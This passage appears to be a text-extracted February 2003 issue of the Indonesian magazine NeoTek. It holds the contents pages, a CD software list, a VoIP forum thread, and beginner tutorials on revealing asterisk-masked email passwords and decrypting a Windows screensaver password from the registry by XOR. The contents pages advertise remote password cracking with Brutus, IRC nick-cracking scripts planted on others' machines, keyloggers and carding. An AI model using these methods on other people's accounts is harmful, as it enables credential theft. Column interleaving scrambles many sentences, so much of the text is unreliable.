NeoSoft

amkm
dari Anda untuk Anda
Permintaan itu makin banyak dan variatif

Jika anda mengirim permintaan sehingga isi suatu CD penuh—

pesan email amkm bulan-bulan berikutya. Tetapi sebenarnya
(anda meminta, kami bukan hanya anda yang memperoleh software
men-download) kepada yang berguna, melainkan pembaca NeoTek lain
kami, anda akan pun “kena getahnya.”
memperoleh perangkat Jadi jangan ge-er bahwa anda egois karena
lunak yang anda minta telah mengirim pesan email amkm kepada
download-kan itu lewat kami, tetapi boleh ge-er karena telah
CD NeoTek bulan membantu sesama NeoTeker mendapat
berikutnya atau kadang—karena banyaknya software berguna. Gitu!

Netscape 7.0 adalah salah satu hasil software • Tabbed browsing

permintaan anda yang kami muat pada CD • Full screen mode
NeoTek bulan ini. • Pop-up control
Sebagai salah satu browser pesaing utama • Click to search
Internet Explorer, Netscape 7.0 mendapat • Print preview
pembaruan yang berarti, Di antaranya pada: Netscape Mail
Netscape Navigator • Quick search
• Quick launch • Mail label
• Bookmark groups • Mail alerts
• Easy filter setup
• Easy importing from other mail program
#1 Instant Messenger
• Easy buddy list access
• File transfer
 HomePage

amkm Salam!
anda Bongkar!
meminta Password sana, password sini.
kami
mendownload
Software gratis
di Internet?
Tapi besarnya...
50Mb... 200Mb?

sa—elephant • Perangkat lunak password cracker Brutus dapat digunakan untuk mengetahui kata
sandi komputer dari jarak jauh (remote computer) lewat sambungan Internet. Anda
cukup memasukkan IP komputer sasaran. Hasilnya dapat anda lihat di atas. Baca

sa—gajah NeoTek nomor ini halaman 12.

rek (crack) bukan hanya bunyi pintu dibongkar pen-

Kami dapat
men-
K curi, tetapi bisa juga menjadi cara penghuni dunia
bawah atawa underground menggangsir password,
download- berbagai macam dan rupa kata sandi (password).
kannya NeoTek nomor ini kembali menyajikan cara menguak pass-
untuk anda. word: email account, screensaver, pcAnywhere, remote
computer, serta nick dan channel IRC. Mudah-mudahan
Kirimkan email ke: cukup membantu anda untuk menggunakannya secara positif.
kosasih_iskandarsjah@yahoo.com
dengan: Redaksi
• Subject: amkm redaksi@neotek.co.id
• Isi pesan: Mohon download-kan
[nama software] dari
[www.blablabla.com] Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id ADMINISTRASI IKLAN
SURAT PEMBACA Tel. 021-5481457 Fax. 021-5329041
support@neotek.co.id SIRKULASI NEOTEK
WEBMASTER Tel. 021-3854764
webmaster@neotek.co.id ALAMAT REDAKSI
PEMASARAN Gedung Cahaya Palmerah Suite 506
pemasaran@neotek.co.id Jl. Palmerah Utara III No. 9
Jakarta 11480
CHATROOM DI DALNET
#neoteker
MILIS PARA NEOTEKER
http://groups.yahoo.com/group/majalahneotek

Februari 2003 NeoTek 1

 Daftar Isi
Daftar Isi
NeoStart
SandiYudha—Cached
7 Password Revealer
SandiYudha dapat memperli-
hatkan karakter asli untuk sebuah
password dengan cara yang mudah.
Membongkar Enkripsi
8 Screensaver Password
Iktui cara mengungkap kata
sandi suatu screensaver secara manual
dengan menggunakan bantuan kode
ASCII.
pcAnywhere Pass View
11 untuk pcAnywhere
Jika anda lupa password
pcAnywhere anda, pcAnywhere Pass
View dapat membantu anda menguak
password yang terlupa itu.
12 Meng-crack Password
Komputer Remote
Tanpa harus mendapat akses
langsung pada komputer, Brutus dapat
digunakan untuk membongkar
password komputer remote.
Situs NeoTek
Jadikan situs NeoTek sebagai pangkalan Anda berselancar
Link Langsung
Kunjungi situs-situs yang dibahas di
majalah NeoTek dengan sekali klik
lewat situs NeoTek.
NeoTek versi PDF
Kehabisan NeoTek di kota Anda?
Dapatkan saja versi PDF-nya. Gratis!
Download
Tersedia juga download di situs
NeoTek selain dari situs aslinya
2 NeoTek Februari 2003
NeoTek Vol. I I I No. 5
NeoTutor
VMware Workstation
41 untuk Linux
Instalasi VMware untuk Linux
menggunakan skrip Perl dan tidak se-
mudah di Windows.
NeoStyle
Keylogger Sebagai
24 Spion
PC Acme Net sebagai keylogger
yang dipasang di komputer anda dapat
digunakan orang lain untuk memata-
matai semua kegiatan berkomputer anda.
www.neotek.co.id
neotek.kpone.com.sg
Layanan Rupa-rupa NeoTek
Perlengkapan berinternet dari situs NeoTek
Channel #neoteker di Dalnet
Ngobrol ramai-ramai sesama NeoTeker
Web Chat Room
Kini tidak usah jauh-jauh untuk ngobrol
langsung dengan sesama NeoTeker
Mailing List
Ini yang paling ramai. Segera ikutan
berbagi pengalaman berinternet!
NeoTeker Official Portal
http://neotek.portal.dk3.com
Situs komunikasi antar Neoteker.
46 Connectix Virtual PC
Instalasi Mesin Maya
Program yang asalnya dari
dunia Macintosh ini kini tersedia pula
untuk Windows. Anda kini dapat men-
coba berbagai macam sistem operasi
serta berbagai macam sistem operasi
pada sistem Windows anda. Tersedia
versi Windows dan Mac.
Connectix Virtual PC
48 Instalasi Guest OS
Berbeda dengan VMware,
Connectix Virtual PC pada dasarnya
menyiapkan dulu hard disk image dari
suatu mesin maya. Pada hard disk
image inilah anda menginstalasi guest
OS apa saja. Termasuk Windows, Mac,
Linux, Solaris, OS/2, atau BSD
Kontra Spionase
26 dengan Anti-Keylogger
Kegiatan spionase keylogger
dapat ditangkis dengan program Anti-
Keylogger.
Menggoda dengan
28 Fake JavaScript
JavaScript dapat dipalsukan
untuk memberikan kejutan kepada
pengunjung suatu situs Web.
31 Mengais Password
Nick & Channel IRC
Wicked IRC Password Cracker
dapat digunakan untuk membongkar
kata sandi nick dan channel di IRC.
Skrip Pembongkar
34 Password Nick
Gunakan skrip yang dapat dita-
namkan di komputer orang lain untuk
membongkar password nick di IRC.
Bongkar Paksa
36 Password Nick
Metode brute force digunakan
untuk membongkar password nick dan
channel di IRC.
 Daftar Isi

NeoSoft
FOKUS BULAN INI Netscape 7.0
0 Versi terakhir browser pe-
saing Internet Explorer ini
dilengkapi fitur-fitur baru
yang berguna untuk
aktivitas Internet anda.

NeoProfil
Kru NeoTek
3 Bermarkas di
Gedung Cahaya Palmerah 503
Mengusung Jl. Palmerah Utara III No. 9
Jakarta 11480
VoIP Merdeka Telp. 021-5481457
Fax. 021-5329041

Pemimpin Umum
e-Commerce Security:
NeoTekno 28 Modus Operandi Carding
Fachri Said
Pemimpin Redaksi
Mengamati ‘dari dalam’ cara
Kosasih Iskandarsjah
kerja carder yang mencakup pencurian
VoIP Merdeka database selain credit card fraud. Redaktur Ahli
14 Membangun Telkom Onno W. Purbo
Michael S. Sunggiardi
Sendiri e-Commerce Security:
Teknologi open source sekarang sudah 30 Kelemahan cart32.exe Pemimpin Usaha
memungkinkan kita membangun jaringan Bahasan teknis cara ‘memanen’ Fahmi Oemar
telepon sendiri, baik itu berjalan terpisah database dari aplikasi shopping cart Ridwan Fachri
maupun diintegrasikan dengan jaringan yang populer, cart32..exe. Shoppinmg Redaktur Pelaksana
telkom yang ‘resmi.’ Bahasan komprehensif cart ini mempunyai kelemahan fatal. Gianto Widianto
baik untuk pemakai biasa maupun pe- Dadi Pakar
nyedia fasilitas VoIP gateway. e-Commerce Security:
Proyek Digital Clock (5)
32 Kelemahan shopper.cgi
Sekretaris Redaksi
Elvy Risma Nainggolan
18 Artikel lanjutan advanced digital
Eksploitasi aplikasi shopping
cart dengan memanfaatkan unicode
Dewan Redaksi
clock berupa penjelasan cara David Sugianto,
bug untuk ‘memanen’ database yang
kerja program NeoClock2.asm. Asmuri Anwar, MA Rody C.
ada di dalamnya.
Webmaster
NeoTek Maret 2003 Supriyanto
Inbox Perl dan Perl Exploit
Pemasaran
Hedhi Sabaruddin
NmN Exploit selain dalam format C,
6 Neoteker menjawab Neoteker
Khusus VoIP Merdeka
banyak juga yang tersedia sebagai
Perl script. Pelajari Perl (pada
Tuti Sundari, Arinto
Iklan dan Promosi
Windows maupun Linux) sebelum Elvy Risma Nainggolan
NeoRagam mencoba exploit-nya. Keuangan
Aswan Bakri
Ada Apa di CD NeoTek? Menjebol Forum
4 Linux Pocketbook 2003 PHP Bulletin Board
VoIP Merdeka Selain aplikasi portal seperti PHP Bank
Nuke atau Postnuke, masih banyak
Bank BNI
Daftar Isi CD NeoTek terdapat aplikasi lain yang berbasis
5 PHP, seperti misalnya phpBB (PHP
a.n. PT NeoTek Maju Mandiri
No. rekening 070.001709720.001
Bulletin Board) ini. Sayang, aplikasi-
aplikasi ini tidak luput dari vulner- Bank BCA KCP Rawamangun
abilities sehingga rawan dijebol. a.n. Aswan Bakri
No. rekening 0940544131

Februari 2003 NeoTek 3

 NeoRagam
Ada Apa di CD NeoTek?
CD NeoTek
Februari 2003
assword cracking
P kembali mendapat
perhatian. Dimulai
dengan memperkenalkan
SandiYudha, karya salah
seorang neoteker yang sama
fungsinya dengan Snadboy’s
Revelation dan dilanjutkan
dengan cara manual meng-
crack screen saver password.
Perhatian khusus dalam
password cracking justru
terhadap nick dan channel
password pada mIRC.
Diperkenalkan tool siap
pakai seperti Wicked IRC
Password Cracker, selain
membuat skrip sendiri
untuk melaksanakan hal
tersebut.
Karena besarnya minat
terhadap virtual PC se-
menjak artikel tentang
VMware for Windows,
NeoTek membahas kem-
bali VMware. Kali ini un-
tuk sistem operasi Linux.
Selain itu dibahas pula
Connectix Virtual PC for
Windows yang berasal
dari dunia Macintosh.
Dalam hal security dibahas
keylogger maupun anti-
keylogger, serta
e-commerce security,
yang mencakup bahasan
cara carder memanen
informasi transaksi (ter-
masuk nomor credit card)
dari situs-situs online
shopping dengan meman-
faatkan kelemahan-kele-
mahan yang ada pada
aplikasi shopping cart.
4 NeoTek Februari 2003
VoIP Merdeka merupakan bahasan utama kali ini yang pada dasarnya
adalah menyiapkan sarana telekomunikasi mandiri untuk rakyat dengan
menyiapkan ‘sentral telepon’ berupa gatekeeper.
LI N U X POC K ETBOO K 2003
haman apa itu Linux, instal- serta security pada Linux.
asi distro-distro populer Bahasan ditutup dengan
yang mencakup cara mem- Linux multimedia yang
partisi hard disk, teknik boot mencakup juga games yang
ke dalam Linux, sampai mu- berjalan pada sistem Linux.
lai menjalankan serta meng-
konfigurasi Linux. Satu lagi yang penting dan
banyak ditanya orang tetapi
Untuk pemula, bahasan me-
ngenai shell operation cukup
jarang dibahas, justru ada di
Linux Pocketbook ini. Cara
memadai. Mulai dari perin- meng-uninstal Linux!
tah-perintah dasar untuk
navigasi Linux, file permis- Referensi akhir pun sangat
sion, mounting file system, bermanfaat. Mencakup file-
instalasi aplikasi baru, sam- file apa saja dan ada di ma-
pai kompilasi kernel! na yang digunakan untuk
konfigurasi Samba, LILO, X
inux pocket Book 2003 Selanjutnya dibahas pula Window, maupun runlevel.
L adalah cara terbaik
untuk mempelajari
struktur direktori dalam
Linux, cara menghubung- Buku kecil yang benar-
Linux, mulai dari pema- benar bermanfaat!
kan Linux dengan Windows,
VoI P Merdeka
Netmeeting (Windows)
XNetmeeting 3.01
XNetmeeting GSM Codec
GnomeMeeting (Linux source)
Xgnomemeeting-0.9.41.tar.gz
Xopenh323_1.9.10.tar.gz
Xpwlib_1.3.11.tar.gz
esuai permintaan para neoteker GnomeMeeting Packages
S untuk ikut serta dalam jaringan
VoIP Merdeka di tempat masing-
XDebian Packages (3 files)
XMandrake Packages (3 files)
masing, pada CD NeoTek kali ini disediakan XRedHat Packages (3 files)
perangkat-perangkat yang dibutuhkan, XSlackware Packages (6 files)
khususnya yang terlah terbukti berhasil XSuSE Packages (3 files)
diujicobakan oleh tokoh utama VoIP
Merdeka, Onno W. Purbo. Gatekeeper (Windows)
Xgk-2.0.2-windows-bin.zip
Di sini pemakai akhir VoIP hanya perlu
Xopengk_20030106_win32.zip
menginstal Netmeeting (untuk pemakai
Windows) atau Gnomemeeting (untuk Gatekeeper (Linux)
pemakai Linux). Khusus untuk Gnome- Xgk-2.0a-linux.bin.tgz (Mdk 8.0)
meeting, sebelumnya perlu diinstal terlebih Xgk-2.0.2-linux-bin.tgz (Mdk 9.0)
dahulu Openh323 dan Pwlib. Xopengk_20030107_linux_x86.tar.gz
Apabila pemakai akhir terhubung ke Internet
melalui proxy server, seperti pada LAN di OpenH323 Gatekeeper Java GUI
warnet, kantor, atau sekolah, maka pada pada Xgkgui06.tgz (Unix tar archive)
proxy server perlu diinstal gatekeeper. Xgkgui06.zip (Windows zip archive)
 NeoRagam

daftar isi cd neotek

ANTI VIRUS LINUX Adhit Recca
Clam Anti Virus clamav-0.22.tar MySQL Control Center mysqlcc-0.8.7-win32.zip
Kapersky Antivirus kavwselinux-4.0.2.2 MySQL Manager mysqlmanager.zip
JSoft Secman for MySQL 1.0 secman.zip
ANTI VIRUS WINDOWS Adi
Bit Defender Anti Virus bd_icq.exe IncrediMail Upgrade IncrediMailSetupU.exe
NAV Definitions 9 Jan. 2003 20030109-006-i32.exe IncrediMail IncrediMailSetup.exe
Outlook 2000 Sec. Update out2ksec.exe
Worm Detector wd_setup.exe Fanni Widodo
MySQL 3.23 MySQL-3.23.53a-1.i386.rpm
JAVASCRIPT TOOLS MySQL 3.23 MySQL-3.23.53a-pc-linux-gnu-i686.tar.gz
ACE HTML AceHTML.exe PHP php-4.2.3.tar.gz
CSE HTML Validator csesetup.exe PHP Nuke PHP-Nuke-6.0.tar.gz
FirstPage 2000 1stpage.zip Frans Maramis
IE Debugger IE4DB.exe Open Office 1.01 Linux OOo_1.0.1_LinuxIntel_install.tar.gz
JavaScript It! jsit202f.zip
JavaScript Scrambler scram111.zip Imam
Netscape JavaScript Debugger JSD11SU.jar Picture Manager Trial 4.02 picman42.zip
Primal Script Primal.exe ReadPlease setupreadplease2003.exe
Kulonuwun
KEYLOGGER PowerDesk 5 pd5free.exe
Acme Net Keylogger pca_net.zip Abi Word 1.03 setup_abiword.bidi.1-0-3.exe
Anti Keylogger 2.2 antikey.zip AdAware 5.83 aaw.exe
E-BOOK Axialis Prof. Screen Saver Prod axscrprod.exe
Linux Pocket Book 2003 LPB2003.pdf EZ Antivirus EZAntivirus.exe
WindowBlinds wb341_pub.exe
PASSWORD CRACKING WinKey winkey.exe
Brutus Remote Cracker brutus-aet2.zip Mythinky
IRC Cracker irc_cracker.zip WS FTP Limited Edition ws_ftple.exe
pcAnywhere 10.10 Trial pcATrialv10.exe WS FTP Pro (40 Bit SSL) WS_FTPPro_eval.exe
pcAnywhere Any Pass pcanypass.zip
Sandi Yudha SandiYudha.zip Rendra Sitorus
Nvidia Driver NVIDIA_GLX-1.0-2313.i386.exe
PROGRAM UMUM R. Sugianto
Win Media Player 9 ME 9x MPSetup.exe Accounting Plus accplus.exe
Win Media Player 9 XP MPSetupXP.exe Atrise HTMLock 1.9.3 htl.zip
WinZip 8.1 winzip 81.exe DivX 5.0.2 Pro DivXPro502GAINBundle.exe
PROYEK Mpeg Layer-3 Codec 1.263 ra-codec12.zip
Fake Crash Spybot—Search & Destroy spybotsd11.exe
Fake Format Virtual Dub VirtualDub-1_4_10.zip
Nick Password Cracker (Skrip) Rudy Hartono
McAffee Uninstaller UNIENU65D30.exe
VIRTUAL PC Netscape 7.0 NSSetup.exe
Connectix Virtual PC Trial VPC_51_Trial.exe
VMWare 3.1.1 Linux VMwareWorkstation-3..1.1-1790.tar.gz Ronald Willem
J2RE 1.4.1 Win j2re-1_4_1_01-windows-i586.exe
VOIP MERDEKA J2SDK 1.4.1 Win j2sdk-1_4_1_01-windows-i586.exe
Panduan Pembangunan Jaringan VoIP Merdeka.pdf Sageayu
Netmeeting 3.01 NM30.exe MPlayer MPlayer-0.90pre10.tar
Netmeeting GSM Codec instcodec.exe
GnomeMeeting source gnomemeeting-0.9.41.tar.gz Teguh Asma
GnomeMeeting Debian 3 files WineX 2.2 winex22.tar.gz
GnomeMeeting Mandrake 3 files Tiyok Agatha
GnomeMeeting RedHat 3 files Cubase SL Update_cubase_SL_1031.exe
GnomeMeeting Slackware 6 files Cubase SX Update_cubase_SL_103.exe
GnomeMeeting SuSE 3 files Nuendo 1.61 Nuendo_161_Patcher.exe
Gatekeeper Mandrake 8.0 gk-2.0a-linux-bin.zip Wave Lab WaveLab_400g_patch.zip
Gatekeeper Mandrake 9.0 gk-2.0.2-linux-bin.zip Ulul
Gatekeeper Windows gk-2.0.2-windows-bin.zip Flightgear fgfs-win32-bin-0.9.1c.zip
OpenH323 Java GUI tarball gkgui06.tgz Websell
OpenH323 Java GUI zip gkgui06.zip Real One Player RealOnePlayerV2GOLD.exe
AMKM
Abdul Aziz
Klondike 1.5 Win kl_wap15.zip
Klondike Handheld PC2000 setup.exe
Klondike Pocket PC 2002 setup.exe
M3 Gate 1.2 m3stp12.exe
M3 Gate 1.2 Pocket PocketM3Gate1_2b.exe
PIC2WBMP 1.0 pic2bmp.zip
EasyPad WAPtor 3.0 waptor3.exe
WinWAP 3.1 Pro WinWAP3P.exe
WinWAP Cassiopeia BE300 wwce12be300.exe
WinWAP Pocket PC Trial winwapce12.exe

• Cubase SL, software untuk pemusik ketika melakukan rekaman di studio.

Februari 2003 NeoTek 5

 Inbox
VoIP Perjuangan
Kang Onno
Posted January 8
Maaf nyepam :( ...
Atas rahmat Allah SWT.
Atas perjuangan rekan Johar
Alam dan Adi di IIX. Atas
sumbangan dan dukungan
rekan-rekan APJII & IIX
Pada siang ini 8 January 2003
Gatekeeper APJII di IIX dengan
nomor IP [202.148.63.18]
yang didedikasikan untuk
registrasi endpoint-endpoint
VoIP perjuangan dengan no-
mor akses perjuangan 0111
xxxxxxxx sudah dapat
beroperasi dan digunakan.
Anda dapat menggunakan
gatekeeper APJII [202.148.63.18]
untuk meregistrasi endpoint
anda (NetMeeting dll) un-
tuk bisa berkomunikasi me-
lalui Internet dan tergabung
dalam jaringan VoIP perjuangan.
Saya yakin pengorbanan
yang dilakukan oleh APJII
dan IIX akan sangat mem-
bantu rekan-rekan yang
sangat mendambakan tele-
pon via Internet dengan tarif
amat sangat murah. Sialnya,
mohon dicatat bahwa jaring-
an 0111 ini tidak bisa dihu-
bungi dari Telkom, maklum
kan jaringan ini hanya ja-
ringan VoIP perjuangan :)
Yah, tapi lumayanlah buat
ngomong sampe berbusa ..
Kalau ada masalah silahkan
complain kepada saya :( ..
diskusi lebih lanjut silahkan
melalui mailinglist
genetika@yahoogroups.com
panduan/cara menggunakan
jaringan VoIP perjuangan
silahkan dilihat dari pandu-
an VoIP Perjuangan yang
bisa di download di
www.bogor.net/idkf/
Sedikit informasi teknis me-
sin gatekeeper APJII ini ha-
6 NeoTek Februari 2003
NmN
Khusus VoIP Merdeka
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.
nya berupa sebuah HP Net-
Server Pentium Pro 200 de-
ngan memory 128Mbyte
dengan harddisk 2Gbyte
menjalankan Linux Man-
drake 9.0 dengan openh323
gatekeeper 2.0.2.
Yah mudah-mudahan bisa
membantu sedikit meringan-
kan penderitaan bangsa
Indonesia ...
Sekali lagi terima kasih ba-
nyak sekali untuk rekan Johar
Alam, Adi, Heru Nugroho,
APJII, IIX dll yang rela me-
ngorbankan resource-nya
untuk bangsa ini :) ...
Onno W. Purbo
Indonesian VoIP MaverickNet:
01110214204701 (ITG/home)
01110214204701 (laptop/home)
01110214208888 (laptop/mobile)
To the Point, Aja...
T: Posted January 8
To the point Pak Onno, saya
melakukan sbb:
1. Dial-up menggunakan
telkomnet
2. open netmeeting (tools -
options-advanced calling)
3. gatekeeper setting:
• use gatekeeper to place
calls (checked) saya isi
202.148.63.18
• log on using my account
name (unchecked)
• og on using my phone
number (checked) saya
isi 01110218499001
4. saya coba new call en call-
ing dua nomor pak onno,
kayaknya pak onno lagi
off line ya ??? atau ...??
Apakah yg saya lakukan udah
benar? Kalo saya sudah
registrasi nomor ini, berarti
ini sudah menjadi nomor sa-
ya? Atau hanya pada saat on-
line? Berarti pemilik nomor
voip harus online 24 jam?
Apakah saya bisa menghu-
bungi nomor telepon biasa
atau handphone dari nomor
voip? Vice versa ???
Terima kasih en maaf kalo
nyerocos ... maklum... udik ;)
Sulchan
msdarmawan@clivarindo.org
J: Posted January 8
> apakah yg saya lakukan
udah benar?
Betul ..
> kalo saya sudah registrasi
nomor ini, berarti ini sudah
menjadi nomor saya? Atau
hanya pada saat online ?
Hanya pada saat online aja ..
> berarti pemilik nomor
voip harus online 24 jam?
Engga juga ..
> apakah saya bisa menghu-
bungi nomor telepon biasa
atau handphone dari nomor
voip? Vice versa?
Kalau ada gatewaynya bisa ..
Onno W. Purbo
onno@indo.net.id
Untuk Luar Negeri?
T: Posted January 8
Apa gatekeeper ini bisa dipake
juga sama orang yang tinggal
di luar negeri? Contohnya di
Belanda/ Jerman. Maksudnya
biar gampang konek dan bisa
online sama sama..
The 10th
d10th@telkom.net
J: Posted January 8
Engga bisa ..Gatekeeper ini
adanya di IIX di Indonesia Engga
diroute buat keluar negeri
Onno W. Purbo
onno@indo.net.id
Kode Area
T: Posted January 8
Klo yg kode area-nya pake
0542, apakah jadi 542 aja
atau gimana?
Wahyu Budi
wbudi@satelindo.co.id
J: Posted January 8
Tul jadi 0111542
Onno W. Purbo
T: Posted January 8
Sesuai usulan rekan-rekan
terutama di Genetika, Ja-
ringan VoIP Perjuangan
diusukan berganti nama
menjadi Jaringan VoIP
Merdeka!!! agar tidak
dihubungkan dengan partai
yang berkuasa ‘n tidak
dipolitisir sebagai usaha partai
yang berkuasa. Pengguna
VoIP Merdeka!!! dapat me-
registrasikan diri ke gate-
keeper menggunakan Net-
Meeting ke 202.148.63.18,
dengan prefix 0111888.
Mohon menggunakan prefix
0111888 untuk nomor
telepon enduser supaya para
operator gatekeeper tidak
pusing kepala melakukan
routing nomor telepon-nya ..
Merdeka!!!
Onno W. Purbo
Advertisement
Posted January 12
Hasil diskusi para operator
gatekeeper VoIP Merdeka!!!
• area code tidak boleh ada
angka NOL (takutnya be-
rabe waktu SLI) jadi Jakarta
011121, Bandung 011122
• pengguna NetMeeting
yang log ke
• 202.148.63.18 -
gunakan prefix 0111888
• 202.159.123.162 -
gunakan prefix 0111251
• 202.43.162.189 - sedang
ditanyakan ke yang
punya gatekeeper
Onno (0111214204701 -
Answering Machine)
 NeoStart

PASSWORD CRACKING
ada Sistem Operasi Windows banyak
P aplikasi yang membutuhkan password.
Anehnya, sebagian aplikasi tersebut
tetap meninggalkan karakter password pada

SANDIYUDHA–CACHED kotak Password-nya, hanya disamarkan dengan

deretan karakter asteriks (*) atau yang lainnya.
Tetapi di balik itu karakter aslinya tetap tertera.

PASSWORD REVEALER Hal ini dapat dijumpai pada Dial-up Connection

Selain Snadboy’s Revelation untuk mengungkap password
yang ada di balik tanda asterisk, kini sudah ada Sandiyudha
karya Cakrabirawa (cakrabirawa@mail.ru) yang menyajikan
fungsi serupa.
bila kita akan membuka koneksi ke Internet,
dan Outlook Express pada bagian Email Account
Properties. Mata bisa ditipu, tetapi lain halnya
dengan program. Dengan SandhiYudha, karak-
ter asterisk tersebut dapat disingkap sehingga
anda dapat mengetahui karakter aslinya. Ikuti
langkah-langkah berikut ini untuk menyingkap
password pada email account properties milik
Outlook Express.

Ada apa di balik password email account anda?

MENGAMBIL SANDIYUDHA DOWNLOAD & EKSTRAKSI JALANKAN OUTLOOK EXPRESS

1 Jalankan browser IE atau yang lain.
Ketikkan 'http://come.to/digital-
2 Setelah proses download selesai,
works' pada kotak Address.
Kemudian klik link 'Cool Stuff'. Klik
kata SandhiYudha untuk men-
download program SandhiYudha.
ekstrak paket zip tersebut ke sem-
3 Sebagai contoh kasus, jalankan pro-
gram Outlook Express. Klik menu
barang folder, misalnya ke My Tools → Accounts. Klik ganda salah
Documents. Paket zip tersebut satu email account. Pada kotak
terdiri dari 2 file yaitu file Read- Properties pilih tab Server. Akan
me.txt dan SandhiYudha.exe. tampak deretan karakter (x) pada
kotak Password.

JALANKAN SANDIYUDHA KURSOR PADA PASSWORD NO DISGUISE

4 Masuklah ke folder My Documents\
SandhiYudha, tempat anda meng-
5 Untuk menyingkap karakter asli di
ekstrak paket zip pada Langkah 2.
Klik dua kali untuk menjalankan
program SandhiYudha.
balik karakter (x), Anda cukup
6 Beri tanda cek pada 'No disguise
character', kemudian arahkan point-
menggerakkan pointer mouse ke er mouse pada kotak Password di
arah kotak Password pada Email Email Account Properties. Bila anda
Account Properties. Karakter asli klik di kotak tersebut, maka karakter
akan diperlihatkan pada kotak (x) akan berubah sesuai karakter
'Code' program SandhiYudha. aslinya.

Februari 2003 NeoTek 7

 NeoStart

PASSWO R D C R AC K I N G
Membongkar Enkripsi
Screensaver Password
NeoTek September 2002 telah membahas cara meng-crack screensaver password dengan bantuan
e. Kini David Sugianto (davidsugianto2002@yahoo.com) mengajak anda
program 95sscrk.exe
melakukan cracking secara manual. Cracking ini menggunakan bantuan kode ASCII.

ENGAPA ANDA PERLU MENGUASAI CARA meng-crack sebelumnya, centang kotak check box Password pro-
M kata sandi screensaver? Karena jika komputer ter-
pasang screensaver yang dilengkapi dengan kata
tected. Lalu klik tombol Change di sebelahnya.
6. Masukkan password yang anda inginkan pada kedua
sandi, dan sewaktu-waktu anda lupa akan kata sandi ter- kotak yang tersedia. Dikedua kotak tersebut, anda ha-
sebut, maka anda tidak akan dapat masuk ke desktop rus mengetikkan kata sandi yang sama. Karena saya
Windows tersebut dan harus me-restart ulang komputer akan membahas mengenai cara cracking kata sandi,
lalu menonaktifkan screensaver. Sebenarnya alasan itu mungkin sebaiknya kata sandi kita samakan terlebih
kurang masuk akal, bagi saya pribadi alasan mempelajari dahulu agar mudah memahaminya. Kata sandi yang
cracking screensaver adalah hanya untuk kesenangan. saya gunakan adalah “DAVID.” Harap diingat kata
Karena saya menganggap cracking itu adalah suatu seni. sandi yang saya gunakan terdiri dari huruf besar
Walaupun artikel ini membahas masalah cracking, namun semua. Klik OK untuk keluar dari kotak tersebut.
bukan berarti artikel ini hanya ditujukan untuk yang su-
dah berpengalaman atau mahir dalam melakukan cracking.
Artikel ini saya buat sebenarnya ditujukan untuk para
pemula yang ingin mencoba terjun ke dunia crack.

Memberikan kata sandi pada screensaver

Seperti telah disinggung di atas, artikel ini untuk pemula.
Maka sebelum mulai meng-crack, anda perlu mempelajari
cara memberikan kata sandi pada screensaver. Bagi anda
• Memasukkan kata sandi.
yang sudah memahaminya, silakan melewati topik ini dan
menuju ke bagian Meng-crack kata sandi screensaver. 7. Jika terdapat pesan bahwa password anda telah berhasil
Untuk memberi kata sandi pada screensaver, langkah- diuubah, klik tombol OK.
langkah yang perlu anda lakukan adalah: 8. Klik OK pada kotak dialog Display Properties untuk
menutupnya.
1 Klik kanan pada desktop Windows anda. 9. Anda telah selesai memberikan passwrod pada screen
2 Pada menu Pop-up, pilih Properties. saver di komputer anda.
3. Pada kotak dia-
log Display Pro- Meng-crack kata sandi screensaver
perties, klik tab Setelah screensaver diberi kata sandi, kini kita akan men-
Screen Saver. coba meng-crack kata sandi tersebut. Dalam artikel ini
4. Pada kotak saya hanya mencoba cracking hingga 14 karakter. Artinya,
dropdown, pilih pembahasan dalam artikel ini hanya efektif jika jumlah
screensaver karakter kata sandi tersebut kurang dari 14 karakter. Wa-
yang sesuai laupun begitu, jangan kecewa dulu, jarang sekali user mem-
dengan selera berikan kata sandi screensaver dengan banyak karakter.
anda. Pada Lagipula artikel ini sebenarnya hanya untuk proses belajar.
artikel ini saya
memilih Kini kita akan mulai meng-crack kata sandi. Jika lupa kata
Baseball untuk sandi pada screensaver, anda dapat melihatnya di registry
screensaver di Windows. Caranya: Buka editor registry, klik Start →
komputer saya. Run lalu ketikkan Regedit. Pada segmen HKEY_USERS\
5. Di bawah kotak .DEFAULT\Control Panel\Desktop terdapat key Screen-
dropdown Saver_Data di panel sebelah kanan. Klik ganda key ter-
tempat anda sebut. Akan muncul kotak Edit Binary Value. Pada kotak
memilih itu terdapat karakter 0CAF205423. Itulah password screen
screensaver saver anda yang telah dienkripsi.
• Kotak Dialog Properties.

8 NeoTek Februari 2003


Yang dimaksud enkripsi disini ialah bahwa password se-
benarnya (DAVID) telah dijadikan bilangan HEX atau
dienkripsi oleh Windows. Oleh karena itu, untuk menam-
pilkan password yang sebenarnya, kita harus melakukan
dekripsi bilangan HEX tersebut.
Seperti yang telah anda ketahui, pada saat membuat kata
sandi screensaver, saya memberikan password DAVID.
Kata tersebut terdiri dari 5 karakter. Namun lihatlah kata
sandi yang telah dienkripsi 0CAF205423 terdiri atas 10
karakter. Dapat disimpulkan bahwa sepasang bilangan
HEX mewakili setiap karakter yang sesungguhnya. Oleh
karena itu, kita harus membagi bilangan HEX tersebut
terlebih dahulu dua-dua, yaitu 0C, AF, 20, 54, 23. Atau
dapat juga disimpulkan:
0C mewakili D (karakter pertama)
AF mewakili A
20 mewakili V
54 mewakili I
23 mewakili D (karakter terakhir)
Jika melihat pembagian di atas, maka mungkin timbul per-
tanyaan: “Mengapa karakter D pertama dan karakter D
terakhir tidak diwakili oleh bilangan HEX yang sama (yang
pertama diwakili 0C dan yang terakhir diwakili 23) padahal
sama-sama karakter D?” Jawabnya akan anda temukan jika
anda telah selesai mempelajari cara cracking kata sandi ini.
Dalam cracking kata sandi, sebenarnya banyak langkah yang
harus dilakukan, namun karena artikel ini ditujukan untuk
pemula maka saya akan mempermudahnya.
Dalam meng-crack kata sandi screensaver, akan digunakan
skema enkripsi. Skema tersebut digunakan sebagai per-
bandingan untuk mengetahui karakter yang sesungguhnya
dari bilangan HEX. Daftar skema enkripsi saya sertakan
pada akhir artikel ini. Karena upaya ini melibatkan kode
ASCII, saya juga menyertakan daftar tabel kode ASCII
untuk mempermudah anda.
Salah satu metode yang terpenting dalam cracking ialah
metode XOR. Berikut ini adalah tabel metode XOR:
MasukanA MasukanB Hasil Keluaran
0 0 0 sama seperti sebelumnya.
0 1 1 C = 0000 1100 ← dari bilangan biner dari HEX C
1 0 1 0000 1000 ← dari tabel enkripsi baris pertama
1 1 0 kolom sebelah kanan.
